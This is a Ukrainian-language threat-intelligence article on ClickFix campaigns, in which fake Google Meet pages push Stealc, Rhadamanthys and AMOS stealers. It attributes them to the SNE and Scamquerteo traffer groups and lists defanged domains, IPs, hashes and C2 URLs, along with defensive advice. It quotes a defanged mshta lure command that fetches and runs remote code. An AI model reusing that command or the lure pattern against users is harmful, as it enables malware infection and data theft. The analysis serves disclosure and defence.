Техніка ClickFix – новий рівень фішингу на платформі Google Meet

12 листопада 2024 3 хвилин Автор: Cyber Witcher

Дізнайтесь, як сучасна тактика соціальної інженерії ClickFix використовує підроблені сторінки відеоконференцій Google Meet для поширення шкідливого ПЗ серед користувачів Windows та macOS. Розкриваємо подробиці атак ClickFix, які зловмисники використовують через фейкові повідомлення про помилки, щоб обманути користувачів.

Контекст

У травні 2024 року виявили нову тактику соціальної інженерії під назвою ClickFix, що пов’язана з кластером ClearFake, ретельно відстежуваним командою Sekoia Threat Detection & Research (TDR) у приватному звіті FLINT 2024-027. Цей новий варіант ClearFake використовує PowerShell і буфер обміну для зараження систем. Тактика передбачає показ підроблених повідомлень про помилки в браузерах, аби змусити користувачів копіювати та запускати шкідливий PowerShell-код, що в результаті призводить до інфікування їхніх пристроїв.

За даними дослідників Proofpoint, які назвали цю тактику ClickFix, брокер початкового доступу TA571 застосовував її у фішингових кампаніях з березня 2024 року. Зазвичай кампанії використовували HTML-файли, масковані під документи Word, що відображали підроблене вікно з помилкою. Це спонукало користувачів встановлювати шкідливе ПЗ, таке як Matanbuchus, DarkGate або NetSupport RAT, через PowerShell-скрипти.

Протягом останніх місяців тактика ClickFix застосовувалася в численних кампаніях, спрямованих на поширення інфостилерів для Windows і macOS, ботнетів і засобів віддаленого доступу. Ця тенденція відповідає методам розповсюдження шкідливого ПЗ через так званий метод “drive-by” завантаження. Аналітики Sekoia підкреслюють, що низка кіберзлочинних угруповань почала активно використовувати цей підхід, щоб уникати антивірусних сканувань та заходів безпеки браузера, що підвищує ефективність зараження.

У статті наведено хронологію спостережень щодо кампаній ClickFix, а також технічні деталі кластера ClickFix, що використовує підроблені сторінки відеоконференцій Google Meet для поширення інфостилерів, націлених на Windows і macOS. Аналітики Sekoia пов’язують цей кластер, що імітує Google Meet, із двома кіберзлочинними угрупованнями: “Slavic Nation Empire (SNE)” та “Scamquerteo”, які є підрозділами команд із шахрайства в криптовалютній сфері “Marko Polo” та “CryptoLove” відповідно.

Хронологічний огляд кампаній ClickFix

З червня 2024 року звіти з відкритих джерел та розслідування Sekoia виявили кампанії, спрямовані на поширення зловмисного програмного забезпечення із застосуванням нової тактики ClickFix. На наступному зображенні представлено хронологічний огляд цих кампаній, що підкреслює типи зловмисного ПЗ та методи його поширення, включно з фішинговими електронними листами, скомпрометованими веб-сайтами та спеціальною інфраструктурою для розповсюдження.
Малюнок 1. Огляд кампаній з розповсюдження зловмисного програмного забезпечення з використанням тактики ClickFix

Ось кілька прикладів шкідливих веб-сайтів, які видають себе за Google Chrome, Facebook, PDFSimpli та reCAPTCHA, використовуючи тактику соціальної інженерії ClickFix.

Малюнок 2. Приклади шкідливих веб-сайтів, які видають себе за Google Chrome, Facebook, PDFSimpli та reCAPTCHA за допомогою тактики ClickFix

Віктимологія кластерів ClickFix

Незважаючи на те, що багато кампаній ClickFix спрямовані на широке охоплення кількох секторів, використовуючи скомпрометовані веб-сайти ClearFake та масові фішингові атаки, деякі з них спеціально орієнтовані на конкретні галузі.

Наприклад, Proofpoint ідентифікував кластери ClickFix, спрямовані на транспортні та логістичні компанії в Північній Америці у період із травня по серпень 2024 року. У цих кампаніях використовувалися веб-сайти, що імітували програмне забезпечення для керування транспортом і автопарком, аби досягти більш цільового впливу.

Крім того, кампанія на платформі GitHub була орієнтована здебільшого на розробників. Вона поширювала Lumma Stealer через фальшиві сповіщення про вразливості, використовуючи довіру розробників до повідомлень від GitHub. Ця широкомасштабна операція, ймовірно, мала на меті зібрати значний обсяг конфіденційних даних розробників, які можуть стати основою для більш прицільних атак у майбутньому.

Нещодавні кампанії, виявлені аналітиками Sekoia, демонструють тенденцію до постійного націлювання як на компанії, так і на окремих користувачів, використовуючи різноманітні методи залучення, такі як підроблені сторінки Google Meet і фейкові групи на Facebook.

Підроблені сторінки Google Meet і технічні проблеми

Аналізуючи текстові елементи у повідомленнях ClickFix, такі як «Натисніть комбінацію клавіш» або «CTRL+V», було виявлено декілька веб-сайтів, що маскуються під головну сторінку Google Meet для відеоконференцій. На цих сайтах з’являлися спливаючі вікна з хибними повідомленнями про проблеми з мікрофоном або гарнітурою, як показано на наступному зображенні.

Малюнок 3. Фальшива домашня сторінка відеоконференції Google Meet із спливаючим вікном із імітацією технічних проблем (ClickFix)

Було визначено перелік доменних імен та IP-адрес, які з високою ймовірністю пов’язані з цим кластером:

meet[.]google[.]us-join[.]com
meet[.]googie[.]com-join[.]us
meet[.]google[.]com-join[.]us
meet[.]google[.]web-join[.]com
meet[.]google[.]webjoining[.]com
meet[.]google[.]cdm-join[.]us
meet[.]google[.]us07host[.]com
googiedrivers[.]com

77.221.157[.]170

Фішингові URL-адреси імітують законні з однаковим шаблоном для ідентифікатора зустрічі, наприклад:

hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj
hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
hxxps://meet[.]google[.]us07host[.]com/coc-btru-ays
hxxps://meet[.]google[.]webjoining[.]com/exw-jfaj-hpa

Користувачі Windows націлені на Stealc і Rhadamanthys

Для користувачів Windows натискання кнопки «Спробувати виправити» призводить до копіювання такої команди в буфер обміну:

mshta hxxps://googIedrivers[.]com/fix-error
Файл виправлення помилок (SHA256: 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138) є HTML-файлом, що містить HTML-програму (HTA) з обфускованим кодом на VBScript. За допомогою сценарію на Python було виконано деобфускацію, у результаті чого вдалося отримати наступний VBScript:
Малюнок 4. Деобфускований сценарій VBS, розповсюджений кластером підроблених зустрічей Google

Після виконання сценарій VBS виконує такі дії:

  1. Він завершує свій батьківський процес ( mshta.exe ).

  2. Він завантажує два виконувані файли ( stealc.exe і ram.exe ) за допомогою bitsadmin. Після двосекундної затримки він сповіщає сервер C2 ( webapizmland[.]com ) про успішне або невдале виконання виконуваних файлів.

  3. Він отримує загальнодоступну IP-адресу жертви за допомогою служби api.ipify[.]org і надсилає її на сервер C2 разом зі статусом виконання.

Два виконуваних файли, stealc.exe (SHA256: a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c) і ram.exe (SHA256: 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe), є корисними навантаженнями Stealc і Rhadamanthys відповідно. Обидва файли захищені шифрувальником HijackLoader.

У цій кампанії сервер управління Stealc (C2) має адресу «hxxp://95.182.97[.]58/84b7b6f977dd1c65.php», а сервер управління Rhadamanthys (C2) розташований за адресою «hxxp://91.103.140[.]200:9078/3936a074a2f65761a5eb8/6fmfpmi7.fwf4p». Обидві IP-адреси вже внесені в базу даних CTI в результаті моніторингу Sekoia.io C2 Trackers, оскільки ми активно відстежуємо інфраструктуру управління (C2) для цих двох сімейств інфостилерів, які поширюються за моделлю «шкідливе ПЗ як послуга».

Примітно, що назва ботнету Stealc, «sneprivate24», вказує на зв’язок із групою траферів «Slavic Nation Empire (SNE)». Додаткові деталі про цей зв’язок представлені в розділі «Команди пересилачів, які керують цим кластером ClickFix».

Користувачі MacOS націлені на AMOS Stealer

Для користувачів macOS натискання кнопки “Try Fix” ініціює завантаження файлу Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) за допомогою наступних HTTP-запитів:

  1. Запит GET до hxxps://carolinejuskus[.]com/kusaka.php?call=launcher , де сервер відповідає другою URL-адресою в HTTP-заголовку Location.

  2. Запит GET до hxxps://carolinejuskus[.]com/f9dfbcf6a999/7cc2f5dc3c76/load.51f8527e20dcb05ffd8586b853937a8a.php?call=launcher , який повертає зловмисне корисне навантаження.

Було ідентифіковано, що корисне навантаження Launcher_v1.94.dmg (SHA256: 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5) є AMOS Stealer, який взаємодіє зі своїм сервером управління (C2) за адресою «hxxp://85.209.11[.]155/joinsystem».

Sekoia здійснює активний моніторинг цієї інфраструктури, зокрема за кінцевою точкою /kusaka.php. З травня 2024 року ця кінцева точка застосовується в кампаніях, де користувачів перенаправляють із шкідливих веб-сайтів для завантаження AMOS Stealer. Ймовірно, кінцева точка використовується для захисту корисного навантаження від небажаного трафіку, такого як автоматизовані завантаження ботами або сканування антивірусними продуктами.

Визначено наступні доменні імена, пов’язані з цією інфраструктурою для розповсюдження шкідливого ПЗ на macOS:

alienmanfc6[.]com
apunanwu[.]com
bowerchalke[.]com
carolinejuskus[.]com
cautrucanhtuan[.]com
cphoops[.]com
dekhke[.]com
iloanshop[.]com
kansaskollection[.]com
lirelasuisse[.]com
mdalies[.]com
mensadvancega[.]com
mishapagerealty[.]com
modoodeul[.]com
pabloarruda[.]com
pakoyayinlari[.]com
patrickcateman[.]com
phperl[.]com
stonance[.]com
utv4fun[.]com

Зважаючи на різноманітність шкідливих веб-сайтів, які переспрямовують на цю інфраструктуру, є висока ймовірність, що вона використовується кількома суб’єктами загрози. Вони, схоже, об’єднані в централізовану команду передачі даних, що співпрацює для спільного використання ресурсів, зокрема інфраструктури і AMOS Stealer, який також продається за моделлю «шкідливе ПЗ як послуга».

Команди Traffers, що керують цим кластером ClickFix

  • Slavic Nation Empire (SNE) – підгрупа Марко Поло

Сервер зловмисника містить цікавий код JavaScript за адресою hxxp://77.221.157[.]170:3004/server.js, що пов’язаний із цією інфраструктурою розповсюдження. Цей JavaScript підключається до бази даних MongoDB для отримання інформації про «працівника» і надсилає статистику двом Telegram-ботам у випадках, коли користувачі відвідують підроблені веб-сайти Google Meet та успішно завантажують корисне навантаження. Команда висловлює вдячність дослідникові кібербезпеки Каролу Пачіореку з CSIRT KNF за допомогу у цьому відкритті.

Нижче наведено фрагмент коду JavaScript, який демонструє повідомлення, що надсилається двом Telegram-ботам:

Малюнок 5. Уривок серверного коду зловмисника, який викрадає дані для ботів Telegram, які використовуються кластером ClickFix «фальшиві зустрічі Google»

Зловмисники використовують сервер для відстеження компрометацій та відвідувань, пов’язаних із кластером ClickFix. Витягнуті журнали чатів Telegram-ботів «#SNE | GMEET OTSTUK» через API Telegram виявили обговорення між sparkhash, ймовірним розробником цього кластера ClickFix, та трафером Alexmen. Розслідування показало, що обидва є членами групи траферів Slavic Nation Empire (SNE), яка є підгрупою шахрайської криптовалютної команди Marko Polo.

Малюнок 6. Витяг дискусії бота Telegram між ймовірним оператором і можливою афілійованою особою кластера «підроблені сторінки Google Meet»

Кіберзлочинці часто використовують ботів Telegram для моніторингу своєї діяльності, особливо коли це передбачає роботу в команді та співпрацю з афілійованими особами (трейдерами/воркерами).

На основі аналізу діяльності цього кластера та повідомлень, які передаються між суб’єктами загрози, які його діють і використовують, аналітики Sekoia висувають таку гіпотезу:

  • Зловмисник sparkhash розгорнув кластер GMeet на користь команди передачі « Slavic Nation Empire (SNE) » , відповідальної за генерування трафіку до цього кластера.

  • Цією командою розповсюджувачів міг би керувати загрозливий актор Alexmen , який контролює діяльність кластерів розповсюдження та, можливо, керує ліцензіями розкрадачів інформації, покладаючись на зовнішні служби.

  • Передачі , також відомі як афілійовані особи або працівники, поширюють шкідливі URL-адреси потенційним жертвам, перенаправляючи їх до цього кластера . Наприклад, кіберзлочинець під назвою web3huntereth міг заразити жертву або себе під час тесту в Польщі, як вказує статистика завантажень бота Telegram.

TDR впевнено асоціює цей кластер, що імітує Google Meet, із командою передачі Slavic Nation Empire (SNE), відомою також як Slavice Nation Land. Ця група забезпечує своїх учасників комплексним набором для здійснення складних шахрайських дій, спрямованих на користувачів криптовалют, Web3-додатків, децентралізованих фінансів та NFT. У комплект входять цільові сторінки, що імітують програмне забезпечення та веб-сторінки для відеоконференцій, а також інфостилери, засоби для дренажу коштів і автоматизовані інструменти для координації атак.

Slavic Nation Empire (SNE) є підгрупою криптовалютної шахрайської команди Marko Polo та частиною російськомовної кіберзлочинної екосистеми. Вдячність висловлюється досліднику кібербезпеки g0njxa за цінну інформацію щодо цих груп. Дослідники Recorded Future також опублікували два звіти з детальним описом діяльності Marko Polo.

Команда Scamquerteo: підгрупа CryptoLove

Було встановлено, що команда розповсюджувачів Scamquerteo також використовує кластер ClickFix, імітуючи Google Meet, зокрема під виглядом FQDN «met[.]google[.]webjoining[.]com» для поширення зловмисного ПЗ. Scamquerteo Team є підгрупою криптовалютної шахрайської команди CryptoLove і також належить до російськомовної екосистеми кіберзлочинності.

Під час розслідування вдалося взаємодіяти з Telegram-ботом, який керує діяльністю траферів для цього підробленого кластера Google Meet, як показано на малюнку нижче.

Малюнок 7. Взаємодія з ботом Telegram Scamquerteo для створення підробленої сторінки Google Meet

Обидві команди траферів, « Slavic Nation Empire (SNE) » і « Scamquerteo », використовують той самий шаблон ClickFix , який імітує Google Meet. Це відкриття свідчить про те, що ці команди обмінюються матеріалами , також відомими як «проект посадки», а також інфраструктурою .

Аналітики Sekoia оцінюють із середньою впевненістю, що обидві команди використовують один і той же сервіс боротьби з кіберзлочинністю, щоб надати їм цей підроблений кластер Google Meet , який залишається невідомим на момент написання статті. Крім того, ймовірно, що третя сторона керує їхньою інфраструктурою або реєструє їхні доменні імена.

Висновок

ClickFix — це нова тактика соціальної інженерії, вперше зафіксована у 2024 році. Станом на вересень 2024 року кілька вторгнень вже застосували цю тактику для широкомасштабного поширення шкідливого програмного забезпечення через фішингові електронні листи, зламані веб-сайти та інші інфраструктури розповсюдження.

ClickFix вводить користувачів в оману, змушуючи їх завантажувати та запускати зловмисне програмне забезпечення на своїх пристроях без необхідності використовувати веб-браузер для ручного завантаження чи виконання файлу. Це дозволяє обійти функції безпеки браузера, такі як Google Safe Browsing, і виглядати менш підозріло для користувачів, включаючи корпоративних та індивідуальних.

Аналізований кластер ClickFix використовує приманку, яка може бути особливо руйнівною в кампаніях, націлених на організації, що використовують Google Workspace, особливо Google Meet. Розслідування траферів, які розповсюджують цей кластер, показало, що основними цілями є користувачі криптовалютних активів, додатків Web3, децентралізованих фінансів та NFT. Вважається, що подібні методи соціальної інженерії можуть бути використані й в інших кампаніях для поширення зловмисного ПЗ.

1. Загальні правила:
– Перевірте URL-адреси: завжди звертайте увагу на адресу веб-сайту. Офіційні домени Google завжди закінчуються на .google.com. Наприклад: meet.google.com, а не google.web-join.com.
– Не копіюйте коди з підозрілих сайтів: жодна авторитетна служба не попросить вас скопіювати та запустити код у PowerShell або в терміналі.
– Ігноруйте спливаючі повідомлення: якщо ви бачите спливаюче повідомлення з помилкою, якої ви не очікували, закрийте браузер і проскануйте систему на наявність шкідливих програм.

2. Використання технічних засобів захисту:
– Захист від шкідливого програмного забезпечення: вимкніть автоматичне виконання сценаріїв, таких як PowerShell, для невідомих джерел.
– Увімкніть захист від фішингу в браузерах, наприклад Google Safe Browsing.

3. Розпізнавання ознак соціальної інженерії:
– Перевірка повідомлень: якщо система видає незвичайну помилку, не вживайте заходів, поки не перевірите її достовірність на офіційному сайті сервісу.
– Аналіз логіки: законні служби не пропонуватимуть «виправити проблему», пропонуючи запустити файл або команду без пояснень.

4. Захист на рівні організацій:
– Навчання співробітників: розробіть програму навчання співробітників, яка включає розпізнавання фішингових атак і методи соціальної інженерії.
– Моніторинг мережі: встановіть системи виявлення загроз (IDS/IPS), які можуть блокувати підозрілі домени.
– Відстежуйте інфраструктуру на наявність незвичайної активності.

Дисклеймер

Ця стаття створена з єдиною метою — підвищити обізнаність про шахрайські методи та забезпечити читачів інструментами для захисту. 

Інші статті по темі
Знайшли помилку?
Якщо ви знайшли помилку, зробіть скріншот і надішліть його боту.